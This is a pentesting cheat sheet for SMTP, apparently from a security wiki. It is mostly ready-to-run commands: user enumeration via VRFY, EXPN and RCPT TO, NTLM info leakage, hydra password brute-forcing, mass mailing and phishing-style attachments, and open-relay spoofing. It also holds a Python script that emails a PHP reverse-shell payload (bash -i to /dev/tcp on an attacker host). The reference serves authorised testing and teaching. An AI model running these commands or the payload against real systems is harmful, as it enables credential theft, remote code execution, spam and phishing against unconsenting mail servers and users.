SMTP
Pentesting SMTP - TCP Ports 25,465,587
Theory
SMTP (Simple Mail Transfer Protocol) is a TCP/IP protocol used for sending e-mail. Default ports are 25 (SMTP), 465 (SMTPS), 587 (SMTPS)
Practice
Enumerate
Commands
We may attempts to use EHLO and HELP commands to gather the Extended commands supported by an SMTP server.
We may list all supported enhanced functions of a SMTP server as follow
root@kali$ telnet example.com 587
220 example.com SMTP Server Banner
>> HELO
250 example.com Hello [x.x.x.x]
>> EHLO all #or EHLO domain.comWe may use the smtp-commands.nse nmap's script
nmap --script smtp-commands -p 25,465,587 <target-ip>Usernames
SMTP supports several interesting commands, such as VRFY, EXPN and RCPT TO.
VRFYrequests asks the server to verify an email address.EXPNasks the server for the membership of a mailing list.RCPT TOis used to specify an email recipient but may trigger an "Unknown user" error if the specified user does not exist.
These can often be abused to verify existing users on a mail server, which is useful information during a penetration test.
smtp-user-enum is a python script for user enumeration via VRFY, EXPN and RCPT
# VRFY - check if the user exists in the SMTP server
smtp-user-enum -M VRFY -u <username> -t <target-ip>
smtp-user-enum -M VRFY -U usernames.txt -t <target-ip>
# RCPT - check if the user is allowed to receive mails in the SMTP server
smtp-user-enum -M RCPT -u <username> -t <target-ip>
smtp-user-enum -M RCPT -U usernames.txt -t <target-ip>
# EXPN - reveal the actual email address
smtp-user-enum -M EXPN -u <username> -t <target-ip>
smtp-user-enum -M EXPN -D <hostname> -U usernames.txt -t <target-ip>We may use the smtp-enum-users.nse nmap's script
nmap --script smtp-enum-users -p 25,465,587 <target-ip>We can use the VRFY command to enumerate users as follow
$ telnet 10.0.0.1 25
Trying 10.0.0.1...
Connected to 10.0.0.1.
Escape character is '^]'.
220 myhost ESMTP Sendmail 8.9.3
HELO
501 HELO requires domain address
HELO x
250 myhost Hello [10.0.0.99], pleased to meet you
VRFY root
250 Super-User <root@myhost>
VRFY blah
550 blah... User unknownWe can use the EXPN command to enumerate users as follow
$ telnet 10.0.10.1 25
Trying 10.0.10.1...
Connected to 10.0.10.1.
Escape character is '^]'.
220 myhost ESMTP Sendmail 8.9.3
HELO
501 HELO requires domain address
HELO x
EXPN test
550 5.1.1 test... User unknown
EXPN root
250 2.1.5 <ed.williams@myhost>
EXPN sshd
250 2.1.5 sshd privsep <sshd@mail2>We can use the RCPT TO command to enumerate users as follow
$ telnet 10.0.10.1 25
Trying 10.0.10.1...
Connected to 10.0.10.1.
Escape character is '^]'.
220 myhost ESMTP Sendmail 8.9.3
HELO x
250 myhost Hello [10.0.0.99], pleased to meet you
MAIL FROM:[email protected]
250 2.1.0 [email protected]... Sender ok
RCPT TO:test
550 5.1.1 test... User unknown
RCPT TO:admin
550 5.1.1 admin... User unknown
RCPT TO:ed
250 2.1.5 ed... Recipient okNTLM Auth - Information disclosure
If the server supports NTLM auth (Windows) you can obtain sensitive info (versions). More information here.
We may leak sensitive information as follow
root@kali$ telnet example.com 587
220 example.com SMTP Server Banner
>> HELO
250 example.com Hello [x.x.x.x]
>> AUTH NTLM 334
NTLM supported
>> TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=
334 TlRMTVNTUAACAAAACgAKADgAAAAFgooCBqqVKFrKPCMAAAAAAAAAAEgASABCAAAABgOAJQAAAA9JAEkAUwAwADEAAgAKAEkASQBTADAAMQABAAoASQBJAFMAMAAxAAQACgBJAEkAUwAwADEAAwAKAEkASQBTADAAMQAHAAgAHwMI0VPy1QEAAAAAWe may use the smtp-ntlm-info.nse nmap's script
nmap --script smtp-ntlm-info --script-args smtp-ntlm-info.domain=example.com -p 25,465,587 <target-ip>Connect
We may use following command to connect to a SMTP
# Netcat
nc <target-ip> 25
# Telnet
telnet <target-ip> 25
# From Windows
dism /online /Enable-Feature /FeatureName:TelnetClient
telnet <target-ip> 25We may use following command to connect to a SMTP server using TLS
# port 25
openssl s_client -starttls smtp -connect <target-ip>:25
# Port 465
openssl s_client -crlf -connect <target-ip>:465
# Port 587
openssl s_client -starttls smtp -crlf -connect <target-ip>:587Authentication Bruteforce
We may use hydra to bruteforce SMTP accounts on the server
# Port 25
hydra -l <username> -P /path/to/passwords.txt <IP> smtp -V
# Port 587 for SMTP with SSL
hydra -l <username> -P /path/to/passwords.txt -s 587 <IP> -S -v -VWe may use the smtp-brute.nse nmap's script
nmap --script smtp-brute -p 25,465,587 <target-ip>Send E-mail
swaks is a swiss army knife for SMTP and can be used to send emails from external domain
# Basic usage
swaks --to [email protected] --from local-user@<local-ip> --server mail.example.com --header "Subject: test" --body "hello"
# Mass email
swaks --to $(cat emails | tr '\n' ',' | less) --from local-user@<local-ip> --server mail.example.com --header "Subject: test" --body "hello"sendEmail is a lightweight, completely command line based, SMTP email agent.
# Send with email attahement
sendEmail -t [email protected] -f [email protected] -s <SMTP_SRV_IP> -u "Important Upgrade Instructions" -a /tmp/BestComputers-UpgradeInstructions.pdfWe may use following python script to send emails
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import smtplib
import sys
lhost = "127.0.0.1"
lport = 443
rhost = "192.168.1.1"
rport = 25 # 489,587
# create message object instance
msg = MIMEMultipart()
# setup the parameters of the message
password = ""
msg['From'] = "attacker@local"
msg['To'] = "victim@local"
msg['Subject'] = "This is not a drill!"
# payload
message = ("<?php system('bash -i >& /dev/tcp/%s/%d 0>&1'); ?>" % (lhost,lport))
print("[*] Payload is generated : %s" % message)
msg.attach(MIMEText(message, 'plain'))
server = smtplib.SMTP(host=rhost,port=rport)
if server.noop()[0] != 250:
print("[-]Connection Error")
exit()
server.starttls()
# Uncomment if log-in with authencation
# server.login(msg['From'], password)
server.sendmail(msg['From'], msg['To'], msg.as_string())
server.quit()
print("[***]successfully sent email to %s:" % (msg['To']))Mail Spoofing
Open Relay
To prevent the sent emails from being filtered by spam filters and not reaching the recipient, the sender can use a relay server that the recipient trusts. Often, administrators haven't overviewed of which IP ranges they have to allow. This results in a misconfiguration of the SMTP server that we will still often find in external and internal penetration tests. Therefore, they allow all IP addresses not to cause errors in the email traffic and thus not to disturb or unintentionally interrupt the communication with potential and current customers:
mynetworks = 0.0.0.0/0We may use the smtp-open-relay script to enumerate if a SMTP server is vulnerable to mail relaying.
nmap -p25 --script smtp-open-relay <IP> -vTools
MagicSpoofing is a python script that checks & test SPF/DMARC DNS records an tries to spoof a domain with a open relay mail system.
# This will send a test email from [email protected] to [email protected]
python3 magicspoofmail.py -d victim.com -t -e [email protected]
# But you can also modify more options of the email
python3 magicspoofmail.py -d victim.com -t -e [email protected] --subject TEST --sender [email protected]Resources
Last updated
Was this helpful?